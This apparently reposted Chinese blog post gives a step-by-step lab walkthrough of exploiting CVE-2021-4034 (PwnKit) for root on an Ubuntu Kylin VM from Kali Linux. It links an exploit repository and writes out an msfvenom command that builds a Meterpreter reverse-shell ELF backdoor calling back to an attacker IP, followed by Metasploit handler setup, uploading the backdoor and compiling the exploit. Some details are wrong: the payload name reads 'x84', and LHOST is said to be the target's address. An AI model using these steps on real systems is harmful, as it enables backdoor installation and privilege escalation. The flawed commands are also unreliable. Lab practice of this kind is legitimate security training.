当前位置:   article > 正文

CVE-2021-4034漏洞攻击案例(提权)_cve-2021-4034 提权

cve-2021-4034 提权

CVE-2021-4034漏洞攻击案例

  • 可以在下面链接下载关于该漏洞的代码脚本
https://github.com/berdav/CVE-2021-4034

1、攻击工具及环境说明(在虚拟机上完成)

Ubuntu Kylin(20.04):作为受攻击目标。

 Kali Linux(2021):作为攻击者的攻击平台。

首先确保两台主机之间的网络连接:确保Ubuntu Kylin和Kali Linux之间可以进行网络通信

2、攻击过程和漏洞利用

 在kali上生成后门脚本文件:参考下面命令(IP地址需要更改)

msfvenom -p linux/x84/meterpreter/reverse_tcp LHOST=192.168.153.152 LPORT=4444 -f elf -o shell.elf


  • 上传后门文件到靶机

  • 进入kali的msf选择对应的模块:

    use exploit/multi/handler

    设置set payload为 和linux相关

  • 设置LHOST为靶机的地址


  • 运行:run,同时在靶机上运行上传的后门脚本(.elf文件)

  • 在kali上可以监听到靶机:(如图所示)


  • 上传漏洞利用脚本代码和工具


  • 编译和运行程序,获得一个root管理员权限

  • 查看当前用户信息

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/从前慢现在也慢/article/detail/1000169
推荐阅读
相关标签
  

闽ICP备14008679号